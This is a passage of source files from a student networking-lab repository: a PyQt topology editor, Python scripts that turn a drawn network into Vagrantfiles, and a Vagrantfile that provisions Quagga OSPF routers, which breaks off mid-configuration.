devices[index][\"network_interfaces\"][table.currentItem().row()][\"netmask\"] = table.currentItem().text()\n if (table.currentItem().column()==2):\n devices[index][\"network_interfaces\"][table.currentItem().row()][\"name_interface\"] = table.currentItem().text()\n \n \n def on_save(self):\n \"\"\"Method called when the user presses the save button in the editor configuration. It applies the changes in the temporary network and updates the network graph of the canvas.\n\n Parameters:\n - self: current instance of the class;\n\n \"\"\" \n G = Network()\n print(self.routers)\n print(self.switches)\n print(self.hosts)\n print(self.hosts)\n network_core.dictionary_to_nodes(self.routers, G)\n network_core.dictionary_to_nodes(self.switches, G)\n network_core.dictionary_to_nodes(self.hosts, G)\n network_core.dictionary_to_nodes(self.others, G)\n network_core.dictionary_to_edges(self.temporary_network.edges, G)\n self.main_window_object.current_network = G\n G.save_graph(\"./NetworkGraphs/Temp_Network/temp_network.html\")\n network_core.html_fix(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n self.main_window_object.update_canvas_html(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n self.main_window_object.ssh_window = ssh_connection(self.main_window_object)\n self.main_window_object.edge_window = edge_editors(self.main_window_object)\n \n self.close()\n \n def on_cancel(self):\n self.close()\n\n\nclass edge_editors(QtWidgets.QMainWindow):\n \n def __init__(self, main_window):\n super(edge_editors, self).__init__()\n self.main_window_object = main_window\n self.temporary_network = self.main_window_object.current_network\n self.setWindowIcon(QtGui.QIcon(\"./Images/edge.png\"))\n self.setWindowTitle(\"Edit edges configuration\")\n self.resize(512, 280)\n self.window_layout = QtWidgets.QGridLayout(self)\n self.edge_combobox = QtWidgets.QComboBox()\n self.edge_combobox.activated[str].connect(lambda: self.bandwidth_up_textbox.setText(str(self.edges[self.edge_combobox.currentIndex()][\"bandwidth_up\"])))\n self.edge_combobox.activated[str].connect(lambda: self.bandwidth_down_textbox.setText(str(self.edges[self.edge_combobox.currentIndex()][\"bandwidth_down\"])))\n self.collect_edges()\n self.bandwidth_up_textbox = QtWidgets.QLineEdit()\n self.bandwidth_up_textbox.textChanged[str].connect(lambda: (self.bandwidth_changes(self.edges, self.edge_combobox.currentIndex(), \"bandwidth_up\" , 
self.bandwidth_up_textbox.text())))\n self.bandwidth_down_textbox = QtWidgets.QLineEdit()\n self.bandwidth_down_textbox.textChanged[str].connect(lambda: (self.bandwidth_changes(self.edges, self.edge_combobox.currentIndex(), \"bandwidth_down\",self.bandwidth_down_textbox.text())))\n if len(self.edges) > 0:\n self.bandwidth_up_textbox.setText(str(self.edges[self.edge_combobox.currentIndex()][\"bandwidth_up\"]))\n self.bandwidth_down_textbox.setText(str(self.edges[self.edge_combobox.currentIndex()][\"bandwidth_down\"]))\n self.button_frame = QtWidgets.QWidget()\n self.button_layout = QtWidgets.QHBoxLayout()\n self.button_layout.setAlignment(QtCore.Qt.AlignRight)\n self.button_save = QtWidgets.QPushButton(\"Save\")\n self.button_save.clicked.connect(self.on_save)\n self.button_cancel = QtWidgets.QPushButton(\"Cancel\")\n self.button_cancel.clicked.connect(self.on_close)\n self.button_layout.addWidget(self.button_save)\n self.button_layout.addWidget(self.button_cancel)\n self.button_frame.setLayout(self.button_layout)\n self.window_layout.addWidget(QtWidgets.QLabel(\"Select the edge:\"), 0, 0)\n self.window_layout.addWidget(self.edge_combobox, 1, 0, 1, 2)\n self.window_layout.addWidget(QtWidgets.QLabel(\"Bandwidth uplink (kbps):\"), 2, 0)\n self.window_layout.addWidget(self.bandwidth_up_textbox, 2,1)\n self.window_layout.addWidget(QtWidgets.QLabel(\"Bandwidth downlink (kbps):\"), 3, 0)\n self.window_layout.addWidget(self.bandwidth_down_textbox, 3,1)\n self.window_layout.addItem(QtWidgets.QSpacerItem(400, 220), 4, 0, 1, 2)\n self.window_layout.addWidget(self.button_frame, 5, 0, 1, 2)\n self.window = QtWidgets.QWidget()\n self.window.setLayout(self.window_layout)\n self.setCentralWidget(self.window)\n\n \n def collect_edges(self):\n self.edges = self.temporary_network.edges\n self.devices = self.temporary_network.nodes\n print(self.edges)\n for edge in self.edges:\n self.edge_combobox.addItem(self.devices[edge[\"from\"]-1][\"label\"] + \" <----> \" + self.devices[edge[\"to\"]-1][\"label\"])\n \n def bandwidth_changes(self, edges, index, direction, new_value):\n if new_value == \"\":\n edges[index][direction] = 0\n else:\n edges[index][direction] = int(new_value)\n\n def on_save(self):\n \"\"\"Method called when the user presses the save button in the editor configuration. It applies the changes in the temporary network and updates the network graph of the canvas.\n\n Parameters:\n - self: current instance of the class;\n\n \"\"\" \n G = Network()\n network_core.dictionary_to_nodes(self.devices, G)\n network_core.dictionary_to_edges(self.edges, G)\n self.main_window_object.current_network = G\n G.save_graph(\"./NetworkGraphs/Temp_Network/temp_network.html\")\n network_core.html_fix(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n self.main_window_object.update_canvas_html(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n self.close()\n \n def on_close(self):\n self.close()\n\n\n\n\ndef main_application():\n application = QtWidgets.QApplication(sys.argv)\n user_interface = network_design_window()\n user_interface.show()\n sys.exit(application.exec_())\n\n"
},
{
"alpha_fraction": 0.6508525013923645,
"alphanum_fraction": 0.6560415029525757,
"avg_line_length": 32.625,
"blob_id": "72a56879bfa1226c018a9d3f58636588f3ae97b4",
"content_id": "9c32d735bee1c95a12f52089407b84938945d9c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1349,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 40,
"path": "/fromHTMLtoVagrant/vagrantConverterCollector.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import VagrantTopologyOSPF, VagrantTopologyMySQL, VagrantTopologySwitch, VagrantTopologyWebServer, VagrantTopology3S2H\nimport codecs\nimport yaml\n\n\ndef find_between( s, first, last ):\n try:\n start = s.index( first ) + len( first )\n end = s.index( last, start )\n return s[start:end]\n except ValueError:\n return \"\"\n\ndef extract_network(network_path):\n file = codecs.open(network_path, \"r\", \"utf-8\")\n html = file.read()\n\n if \"nodes = new vis.DataSet(\" in html:\n nodes = yaml.safe_load(find_between(html, \"nodes = new vis.DataSet(\" , \")\"))\n print(nodes)\n\n\n if \"edges = new vis.DataSet(\" in html:\n edges = yaml.safe_load(find_between(html, \"edges = new vis.DataSet(\", \")\"))\n print(edges)\n\n return nodes, edges\n\ndef converter_selector(network_path, template):\n nodes, edges = extract_network(network_path)\n if(template == \"OSPF\"):\n VagrantTopologyOSPF.html_to_vagrantfile(nodes, edges)\n if(template == \"MySQL\"):\n VagrantTopologyMySQL.html_to_vagrantfile(nodes, edges)\n if(template == \"Switch\"):\n VagrantTopologySwitch.html_to_vagrantfile(nodes, edges)\n if(template == \"WebServer\"):\n VagrantTopologyWebServer.html_to_vagrantfile(nodes, edges)\n if(template == \"3S2H\"):\n VagrantTopology3S2H.html_to_vagrantfile(nodes, edges) \n"
},
{
"alpha_fraction": 0.5369760394096375,
"alphanum_fraction": 0.5766746997833252,
"avg_line_length": 35.73023223876953,
"blob_id": "6fe5bb1b6a272587e717602ddfbec9e3f9567ef7",
"content_id": "f13727e855441cc3d886cd9f1de0ff15f31cfe08",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15794,
"license_type": "permissive",
"max_line_length": 239,
"num_lines": 430,
"path": "/fromHTMLtoVagrant/OldScripts/VagrantTopologySwitch.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import ipcalc \n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f,Network):\n print(\"writing the beginning of the vagrant file\")\n f.write(\"# -*- mode: ruby -*- \\n# vi: set ft=ruby :\\n\\n\")\n f.write(\"#All Vagrant configuration is done below. The 2 in Vagrant.configure\\n#configures the configuration version we support older styles for\\n#backwards compatibility. Please don't change it unless you know what\\n#you're doing.\\n\")\n f.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\n f.write(\"config.vm.box_check_update = true\\n\")\n f.write(\"config.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usb\\\", \\\"on\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usbehci\\\", \\\"off\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc2\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc3\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc4\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc5\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.cpus = 1\\n\")\n f.write(\"end\\n\")\n\n\n#this function write in the vagrant file a new PC host\ndef writeHost(f,Host,Topology):\n\n print(\"adding an host to the vagrant file\")\n\n #extrapolate each attribute from the touples\n Id = Host[1][\"Id\"]\n Name = Host[1][\"Name\"]\n Os = Host[1][\"Os\"]\n Ram = Host[1][\"Ram\"]\n\n Ip = Host[1][\"Network\"][0][\"Ip\"]\n Netmask = Host[1][\"Network\"][0][\"Netmask\"]\n Interface = Host[1][\"Network\"][0][\"Interface\"]\n IpNoSub = Ip.split(\"/\")[0]\n\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n\n Ip3 = Topology[3][1][\"Network\"][0][\"Ip\"]\n Mask3 = Topology[3][1][\"Network\"][0][\"Netmask\"]\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = str(Network3.network())\n\n Ip4 = Topology[3][1][\"Network\"][1][\"Ip\"]\n Mask4 = Topology[3][1][\"Network\"][1][\"Netmask\"]\n Network4 = ipcalc.Network(Ip4)\n IpNet4 = str(Network4.network())\n\n Ip8 = Topology[5][1][\"Network\"][0][\"Ip\"]\n Mask8 = Topology[5][1][\"Network\"][0][\"Netmask\"]\n Network8 = ipcalc.Network(Ip8)\n IpNet8 = str(Network8.network())\n\n Ip12 = Topology[5][1][\"Network\"][1][\"Ip\"]\n Mask12 = Topology[5][1][\"Network\"][1][\"Netmask\"]\n Network12 = ipcalc.Network(Ip12)\n IpNet12 = str(Network12.network())\n\n if Id is 1:\n Gateway = Ip8.split(\"/\")[0]\n\n if Id is 2:\n Gateway = Ip12.split(\"/\")[0]\n\n if Id is 3:\n Gateway = Ip2.split(\"/\")[0]\n\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os +\"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n if Id is 1:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_host_\" + Name + \"\\\", auto_config: true\\n\")\n if Id is 2:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_host_\" + Name + \"\\\", auto_config: true\\n\")\n if Id is 3:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + 
Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\") \n f.write(\"#.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"#echo \\\"Installation of Lynx Text-Based Browser to access the Web-Server via terminal on \" + Name + \"\\\"\\n\")\n f.write(\"#sudo apt-get update\\n\")\n f.write(\"#sudo apt-get install -y lynx\\n\")\n f.write(\"#echo \\\"Lynx-Browser is installed\\\"\\n\")\n f.write(\"#SHELL\\n\")\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started for \" + Name + \"\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n\n f.write(\"sudo route add -net \" + IpNet2 + \" netmask \" + Mask2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet3 + \" netmask \" + Mask3 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet4 + \" netmask \" + Mask4 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\") \n\n if Id is 1: \n f.write(\"sudo route add -net \"+ IpNet12 + \" netmask \" + Mask12 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n\n if Id is 2:\n f.write(\"sudo route add -net \" + IpNet8 + \" netmask \" + Mask8 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n \n if Id is 3: \n f.write(\"sudo route add -net \" + IpNet8 + \" netmask \" + Mask8 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet12 + \" netmask \" + Mask12 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n \n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n if Id is 3:\n f.write(Name + \".vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Installation of Web-Server\\\"\\n\")\n f.write(\"sudo apt-get update\\n\")\n f.write(\"sudo apt-get install -y apache2\\n\")\n f.write(\"echo \\\"Web-ServerServer is installed and Runing\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + Ram + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n\n\n#this function write in the vagrant file a new Router\ndef writeRouter(f,Router,Topology):\n\n print(\"adding a router to the vagrant file\")\n\n #extrapolate each attribute from the touples\n Id = Router[1][\"Id\"]\n Name = Router[1][\"Name\"]\n Ram = Router[1][\"Ram\"]\n Os = Router[1][\"Os\"]\n\n Ip1 = Router[1][\"Network\"][0][\"Ip\"]\n Netmask1 = Router[1][\"Network\"][0][\"Netmask\"]\n Interface1 = Router[1][\"Network\"][0][\"Interface\"]\n IpNoSub1 = Ip1.split(\"/\")[0]\n\n Ip2 = Router[1][\"Network\"][1][\"Ip\"]\n Netmask2 = Router[1][\"Network\"][1][\"Netmask\"]\n Interface2 = Router[1][\"Network\"][1][\"Interface\"]\n IpNoSub2 = Ip2.split(\"/\")[0]\n\n if Id is 4: \n tag = \"1\"\n if Id is 5: \n tag = \"2\" \n\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n\n Ip3 = Topology[5][1][\"Network\"][2][\"Ip\"]\n Mask3 = Topology[5][1][\"Network\"][2][\"Netmask\"]\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = str(Network3.network())\n\n Ip8 = Topology[5][1][\"Network\"][0][\"Ip\"]\n Mask8 = Topology[5][1][\"Network\"][0][\"Netmask\"]\n Network8 = ipcalc.Network(Ip8)\n IpNet8 = str(Network8.network())\n\n Ip12 = Topology[5][1][\"Network\"][1][\"Ip\"]\n Mask12 = 
Topology[5][1][\"Network\"][1][\"Netmask\"]\n Network12 = ipcalc.Network(Ip12)\n IpNet12 = str(Network12.network())\n\n GatewaySwitch = Topology[5][1][\"Network\"][2][\"Ip\"]\n GatewaySwitch = GatewaySwitch.split(\"/\")[0]\n\n GatewayRouter1 = Topology[3][1][\"Network\"][1][\"Ip\"]\n GatewayRouter1 = GatewayRouter1.split(\"/\")[0]\n\n GatewayRouter2 = Topology[4][1][\"Network\"][1][\"Ip\"]\n GatewayRouter2 = GatewayRouter2.split(\"/\")[0]\n\n\n\n f.write(\"config.vm.define \\\"\" + Name+ \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub1 + \"\\\", netmask: \\\"\" + Netmask1 + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-\" + tag + \"\\\", auto_config: true\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub2 + \"\\\", netmask: \\\"\" + Netmask2 + \"\\\", virtualbox__intnet: \\\"broadcast_router-inter\\\", auto_config: true\\n\")\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n\n if Id is 4: \n f.write(\"sudo route add -net \" + IpNet2 + \" netmask \" + Mask2 + \" gw \" + GatewayRouter2 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet8 + \" netmask \" + Mask8 + \" gw \" + GatewaySwitch + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet12 + \" netmask \" + Mask12 + \" gw \" + GatewaySwitch + \" dev \" + Interface1 + \"\\n\")\n\n\n if Id is 5: \n f.write(\"sudo route add -net \" + IpNet3 + \" netmask \" + Mask3 + \" gw \" + GatewayRouter1 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet8 + \" netmask \" + Mask8 + \" gw \" + GatewayRouter1 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet12 + \" netmask \" + Mask12 + \" gw \" + GatewayRouter1 + \" dev \" + Interface2 + \"\\n\")\n\n \n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + Ram + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n#this function write in the vagrant file a new Router\ndef writeSwitch(f,Switch,Topology):\n\n #extrapolate each attribute from the touples\n Name = Switch[1][\"Name\"]\n Ram = Switch[1][\"Ram\"]\n Os = Switch[1][\"Os\"]\n\n IpA = Switch[1][\"Network\"][0][\"Ip\"]\n NetmaskA = Switch[1][\"Network\"][0][\"Netmask\"]\n InterfaceA = Switch[1][\"Network\"][0][\"Interface\"]\n\n IpB = Switch[1][\"Network\"][1][\"Ip\"]\n NetmaskB = Switch[1][\"Network\"][1][\"Netmask\"]\n InterfaceB = Switch[1][\"Network\"][1][\"Interface\"]\n\n IpSW = Switch[1][\"Network\"][2][\"Ip\"]\n NetmaskSW = Switch[1][\"Network\"][2][\"Netmask\"]\n InterfaceSW = Switch[1][\"Network\"][2][\"Interface\"]\n\n Gateway = Topology[3][1][\"Network\"][0][\"Ip\"]\n Gateway = Gateway.split(\"/\")[0]\n\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n\n Ip4 = Topology[3][1][\"Network\"][1][\"Ip\"]\n Mask4 = Topology[3][1][\"Network\"][1][\"Netmask\"]\n Network4 = ipcalc.Network(Ip4)\n IpNet4 = str(Network4.network())\n\n\n print(\"adding a switch to the 
vagrant file\")\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os +\"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_\" + Topology[0][1][\"Name\"] + \"\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_\" + Topology[1][1][\"Name\"] + \"\\\", auto_config: false\\n\")\n f.write(Name + \".vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"OpenVSwitch Installation is started\\\"\\n\")\n f.write(\"apt-get update\\n\")\n f.write(\"apt-get install -y tcpdump\\n\")\n f.write(\"apt-get install -y openvswitch-common openvswitch-switch apt-transport-https ca-certificates curl software-properties-common\\n\")\n f.write(\"echo \\\"OpenVSwitch Bridge Configuration Started\\\"\\n\")\n f.write(\"sudo ovs-vsctl add-br SW1\\n\")\n f.write(\"sudo ovs-vsctl add-br HA\\n\")\n f.write(\"sudo ovs-vsctl add-br HB\\n\")\n f.write(\"sudo ovs-vsctl add-port SW1 eth1\\n\")\n f.write(\"sudo ovs-vsctl add-port HA eth2\\n\")\n f.write(\"sudo ovs-vsctl add-port HB eth3\\n\")\n f.write(\"echo \\\"Bridge configuration END\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"OpenVSwitch Ip addressing is started\\\"\\n\")\n f.write(\"sudo ifconfig SW1 \" + IpSW + \"\\n\")\n f.write(\"sudo ifconfig HA \" + IpA + \"\\n\")\n f.write(\"sudo ifconfig HB \" + IpB + \"\\n\")\n f.write(\"sudo ifconfig SW1 up\\n\")\n f.write(\"sudo ifconfig HA up\\n\")\n f.write(\"sudo ifconfig HB up\\n\")\n f.write(\"sudo ifconfig eth1 up\\n\")\n f.write(\"sudo ifconfig eth2 up\\n\")\n f.write(\"sudo ifconfig eth3 up\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo route add -net \" + IpNet2 +\" netmask \" + Mask2 + \" gw \" + Gateway + \" dev \" + InterfaceSW + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet4 +\" netmask \" + Mask4 + \" gw \" + Gateway + \" dev \" + InterfaceSW + \"\\n\")\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\"+ Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n # User can select the desired menmory for the machine. 
we must allow them\n f.write(\"vb.memory = \" + Ram +\"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n \n \n\n \n\n\n\n\n#the following is a fake graph that i used for testing\n#instead of typing everytime the input in the command line\nhost1 = (1,{\n \"Id\" : 1,\n \"Name\":\"host1\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"Network\" : [{\n \"Ip\": \"172.16.8.5/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"eth1\"\n }]\n})\nhost2 = (2,{\n \"Id\" : 2,\n \"Name\":\"host2\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"Network\" : [{\n \"Ip\": \"172.16.12.5/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"eth1\"\n }]\n})\nhost3 = (3,{\n \"Id\" : 3,\n \"Name\":\"host3\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"Network\" : [{\n \"Ip\": \"172.16.2.5/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\n\nrout1 = (4,{\n \"Id\" : 4,\n \"Name\": \"router1\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"Network\" : [{\n \"Ip\": \"172.16.3.5/28\",\n \"Netmask\": \"255.255.255.240\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"172.16.4.9/30\",\n \"Netmask\": \"255.255.255.252\",\n \"Interface\" : \"eth2\"\n }]\n})\nrout2 = (5,{\n \"Id\" : 5,\n \"Name\":\"router2\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"Network\" : [{\n \"Ip\": \"172.16.2.10/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"172.16.4.10/30\",\n \"Netmask\": \"255.255.255.252\",\n \"Interface\" : \"eth2\"\n }]\n})\nswitch1 = (6,{\n \"Id\" : 6,\n \"Name\":\"switch1\",\n \"Type\": \"Switch\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"Network\" : [{\n \"Ip\": \"172.16.8.10/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"HA\"\n },{\n \"Ip\": \"172.16.12.10/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"HB\"\n },{\n \"Ip\": \"172.16.3.2/28\",\n \"Netmask\": \"255.255.255.240\",\n \"Interface\" : \"SW1\"\n }]\n})\n\nfakeNet = [host1,host2,host3,rout1,rout2,switch1]\n\ndef main():\n VagrantFile = open(\"VagrantfileSWITCH\", \"w\")\n\n #read the data structure from input\n #Network = G.nodes.data():\n Network = fakeNet\n\n #first, let's write the beginnig of the VagrantFile\n BeginVagrantFile(VagrantFile,Network)\n\n\n #second, let's write each device with his feature\n #this topology has 3 hosts, 1 switch and 3 routers\n for device in Network:\n #call the respective function to \"populate\" the vagrant file\n typeOfDevice = device[1][\"Type\"]\n print(\"the device is a \" + typeOfDevice)\n\n if typeOfDevice is \"Router\":\n writeRouter(VagrantFile,device,Network)\n\n for device in Network:\n #call the respective function to \"populate\" the vagrant file\n typeOfDevice = device[1][\"Type\"]\n print(\"the device is a \" + typeOfDevice)\n if typeOfDevice is \"Switch\":\n writeSwitch(VagrantFile,device,Network)\n\n\n for device in Network:\n #call the respective function to \"populate\" the vagrant file\n typeOfDevice = device[1][\"Type\"]\n print(\"the device is a \" + typeOfDevice)\n if typeOfDevice is \"Host\":\n writeHost(VagrantFile,device,Network)\n\n VagrantFile.write(\"end\\n\")\n VagrantFile.close()\n\nmain()\n"
},
{
"alpha_fraction": 0.6978299617767334,
"alphanum_fraction": 0.7596560716629028,
"avg_line_length": 34.39613342285156,
"blob_id": "a79f36f61e358d363190de62039edc01e6a11007",
"content_id": "7bcc380be452e8e9f5052ffea269e4ab8e86b2a8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 7327,
"license_type": "permissive",
"max_line_length": 151,
"num_lines": 207,
"path": "/AllVagrantFiles/Ospf_Routing/Vagrantfile",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "# -*- mode: ruby -*- \n# vi: set ft=ruby :\n\n#All Vagrant configuration is done below. The 2 in Vagrant.configure\n#configures the configuration version we support older styles for\n#backwards compatibility. Please don't change it unless you know what\n#you're doing.\nVagrant.configure(\"2\") do |config|\nconfig.vm.box_check_update = true\nconfig.vm.provider \"virtualbox\" do |vb|\nvb.customize [\"modifyvm\", :id, \"--usb\", \"on\"]\nvb.customize [\"modifyvm\", :id, \"--usbehci\", \"off\"]\nvb.customize [\"modifyvm\", :id, \"--nicpromisc2\", \"allow-all\"]\nvb.customize [\"modifyvm\", :id, \"--nicpromisc3\", \"allow-all\"]\nvb.customize [\"modifyvm\", :id, \"--nicpromisc4\", \"allow-all\"]\nvb.customize [\"modifyvm\", :id, \"--nicpromisc5\", \"allow-all\"]\nvb.cpus = 1\nend\nconfig.vm.define \"routerjack\" do |routerjack|\nrouterjack.vm.box = \"bento/ubuntu-16.04\"\nrouterjack.vm.hostname = \"routerjack\"\nrouterjack.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: false\nrouterjack.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-2\", auto_config: false\nrouterjack.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-1\", auto_config: false\nrouterjack.vm.provision \"shell\", inline: <<-SHELL\necho \" Quagga routerjack start installing\"\n#sudo sysctl -w net.ipv4.ip_forward=1\nsudo apt-get update\nsudo apt-get install quagga quagga-doc traceroute\nsudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\nsudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\nsudo chown quagga.quaggavty /etc/quagga/*.conf\nsudo /etc/init.d/quagga start\nsudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\nsudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\nsudo echo 'VTYSH_PAGER=more' >>/etc/environment\nsudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\nsudo /etc/init.d/quagga restart\necho \"Routing Protocol ospf Configuration Started\"\nsudo vtysh -c '\nconfigure terminal\nrouter ospf\nnetwork 192.168.1.0/24 area 0.0.0.0\nnetwork 192.168.100.0/24 area 0.0.0.0\nnetwork 192.168.101.0/24 area 0.0.0.0\nexit\ninterface eth1\nip address 